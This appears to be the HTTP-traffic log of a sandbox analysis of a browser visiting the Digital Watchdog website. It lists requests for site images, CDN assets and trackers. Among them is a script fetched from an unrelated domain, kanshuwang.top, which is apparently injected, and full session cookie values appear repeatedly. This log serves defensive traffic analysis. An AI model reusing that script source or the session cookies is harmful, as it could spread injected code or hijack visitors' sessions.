    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon4.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/facebook_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/youtube_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/X_icon.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/linkedin_icon_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/top_nav_icon5.jpg HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /assets/Inventory_Clearance_Banner.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/ig_icon_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/facebook_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /admin/assets/_medialibrary/20250414151519dp875346491.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /i/fa-angle-down-dark.png HTTP/1.1Host: digital-watchdog.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://digital-watchdog.com/css/framework.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/youtube_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /td/rul/456244667?random=1748615717986&cv=11&fst=1748615717986&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&u_w=1280&u_h=1024&url=https%3A%2F%2Fdigital-watchdog.com%2F&hn=www.googleadservices.com&frm=0&tiba=Digital%20Watchdog%20l%20Welcome&npa=0&pscdl=noapi&auid=2004574435.1748615718&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-da
    Source: global trafficHTTP traffic detected: GET /releases/v5.8.1/webfonts/fa-solid-900.woff2 HTTP/1.1host: use.fontawesome.comorigin: https://digital-watchdog.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://use.fontawesome.com/releases/v5.8.1/css/all.cssaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
    Source: global trafficHTTP traffic detected: GET /ls/index.php?akFFGw9O HTTP/1.1Host: kanshuwang.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/X_icon.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/linkedin_icon_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /assets/DW_Spectrum_logo_reverse.png HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1host: bat.bing.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Analog_Family_new.png HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Security_03.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Recording_03.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Recording_01.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20240926103100dp1292485779.png HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Network_02.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220708113233dp1880617416.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/form_loading_new.gif HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /ccm/collect?tid=AW-456244667&en=page_view&dl=https%3A%2F%2Fdigital-watchdog.com%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=1875455421.1748615718&dt=Digital%20Watchdog%20l%20Welcome&auid=2004574435.1748615718&navt=n&npa=0&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&tft=1748615718014&tfd=3380&apve=1&apvf=f HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /models/webstat.php HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW-MEGApix-Ai_Banner.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/IP_Family_new.png HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20240927083602dp630400556.png HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
